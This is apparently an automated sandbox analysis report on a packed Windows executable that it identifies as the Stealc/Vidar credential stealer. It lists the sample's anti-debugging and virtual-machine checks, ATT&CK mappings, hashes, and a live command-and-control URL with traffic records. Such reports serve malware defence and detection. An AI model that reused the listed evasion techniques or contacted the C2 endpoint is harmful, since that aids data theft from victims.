                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9377 second address: AA937B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7B1A1 second address: B7B1B5 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDF30D0E2F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007FDF30D0E2F6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7DDF9 second address: B7DDFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7F420 second address: B7F437 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FDF30D0E2F6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FDF30D0E2FBh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B80D98 second address: B80D9F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0283 second address: 51E0287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0287 second address: 51E028D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E028D second address: 51E0293 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0293 second address: 51E02B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007FDF30F40A60h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E02B4 second address: 51E02B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E02B8 second address: 51E02BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E02EC second address: 51E0331 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E301h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDF30D0E2FEh 0x0000000f push eax 0x00000010 jmp 00007FDF30D0E2FBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FDF30D0E300h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0331 second address: 51E0337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0337 second address: 51E0366 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDF30D0E2FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f mov dh, 4Eh 0x00000011 popad 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FDF30D0E301h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0366 second address: 51E036C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E036C second address: 51E0370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 51E0370 second address: 51E0374 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AA83D2 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006A38B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006A4910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0069DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0069E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_006A4570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0069ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0069BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006916D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006916D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006A3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_006A3EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0069F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0069F68A FindFirstFileA,0_2_0069F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00691160 GetSystemInfo,ExitProcess,0_2_00691160
                Source: file.exe, file.exe, 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,U&i
                Source: file.exe, 00000000.00000002.2117942451.0000000001292000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0{,
                Source: file.exe, 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13589
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13586
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13609
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13601
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13641
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006945C0 VirtualProtect ?,00000004,00000100,00000000 0_2_006945C0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_006A9860
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A9750 mov eax, dword ptr fs:[00000030h] 0_2_006A9750
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_006A7850
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 6984, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 0_2_006A9600
Source: file.exe, file.exe, 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: ]Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_006A7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess, 0_2_006A6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_006A7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_006A7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_006A7A30

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6984, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.690000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2075603665.0000000005050000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6984, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

MITRE ATT&CK Matrix (listed per tactic; a number before a technique is the report's count for that technique, techniques without a number had no matches)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 11 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 2 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus detection (sample)
Source | Detection | Scanner | Label
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML
No Antivirus matches

Antivirus detection (URLs)
Source | Detection | Scanner | Label
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
No contacted domains info

Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown

URLs from memory and binary strings
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37I | file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp | true | (none) | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2117942451.000000000124E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
http://185.215.113.37/e2b1563c6670f193.php8 | file.exe, 00000000.00000002.2117942451.00000000012C2000.00000004.00000020.00020000.00000000.sdmp | true | (none) | unknown
http://185.215.113.37/; | file.exe, 00000000.00000002.2117942451.00000000012A8000.00000004.00000020.00020000.00000000.sdmp | true | (none) | unknown

Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
General Information
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1522245
Start date and time: 2024-09-29 15:16:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 2m 50s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 2
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: file.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@1/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 80%
• Number of executed functions: 19
• Number of non-executed functions: 82
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): dllhost.exe
• VT rate limit hit for: file.exe
No simulations

Context by IP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
185.215.113.37 | file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
No context

Context by ASN
Match | Associated Sample Name / URL | Detection | Threat Name | Context
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | inject.exe | malicious | RedLine, Xmrig | 185.215.113.22
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc | 185.215.113.37
WHOLESALECONNECTIONSNL | file.exe | malicious | Stealc, Vidar | 185.215.113.37
No context
No context
No created / dropped files found
Static File Info
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.9472147631246255
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'839'104 bytes
MD5: c4989e7909961b15e2428e4bdc416bf1
SHA1: 6a36b4ad1ca0fce053b450cf21fe848a168870e6
SHA256: 36453fb6acaf0514d0af6fbf8ed6b8da0372c90b713c18ef73d63b97f2ec5f53
SHA512: ce5efc0f50ff511898e601e08eba937d09be04ee0852a2e2260987e372b736f82dd923fa3f16724b38a376409b949545eae0c52c9d6ee4849129d4b7077241fb
SSDEEP: 24576:wgKdD5zyIIUHgsgsCJY/uLKrFRp87pHYZwssGp67VNyuB+JHB/vnPVN2WeQD3mXH:MF2UOY/uLEXg7ssr9Q/lNO4CEUvhZ
TLSH: AC8533446FD380E5D0B8997BC95F9EA863B54190A4EEE0534F89A9FB053E0450B37F72
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
Icon Hash: 00928e8e8686b000
Entrypoint: 0xa98000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 2eabe9054cad5152567f0699947a2c5b
                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319
                      Name | Virtual Address | Virtual Size | Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                      (no name) | 0x1000 | 0x25b000 | 0x22800 | 2d3db0dc47b972ade98ae2f32d302238 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      (no name) | 0x25e000 | 0x29e000 | 0x200 | 525c77c2685b45eeb38313b3818c87d0 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      gnrpyfds | 0x4fc000 | 0x19b000 | 0x19ac00 | 5ba81c144b20ac6757c8bc21b2b58c6a | False | 0.9948069223600122 | data | 7.953723729400017 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      orxvkivb | 0x697000 | 0x1000 | 0x600 | 1ebd04c432fffb9110a5ca6df22d137b | False | 0.578125 | data | 4.99055856352984 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant | 0x698000 | 0x3000 | 0x2200 | 6e8a32136c895b06d74a7d3412c09720 | False | 0.06571691176470588 | DOS executable (COM) | 0.6997224486146711 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      DLL | Import
                      kernel32.dll | lstrcpy
                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                      2024-09-29T15:17:05.403571+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                      Sep 29, 2024 15:17:04.476125956 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Sep 29, 2024 15:17:04.481193066 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Sep 29, 2024 15:17:04.481306076 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Sep 29, 2024 15:17:04.481549978 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Sep 29, 2024 15:17:04.486435890 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Sep 29, 2024 15:17:05.173070908 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Sep 29, 2024 15:17:05.173132896 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Sep 29, 2024 15:17:05.177233934 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Sep 29, 2024 15:17:05.183305025 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Sep 29, 2024 15:17:05.403445005 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
                      Sep 29, 2024 15:17:05.403570890 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      Sep 29, 2024 15:17:07.888881922 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                      • 185.215.113.37
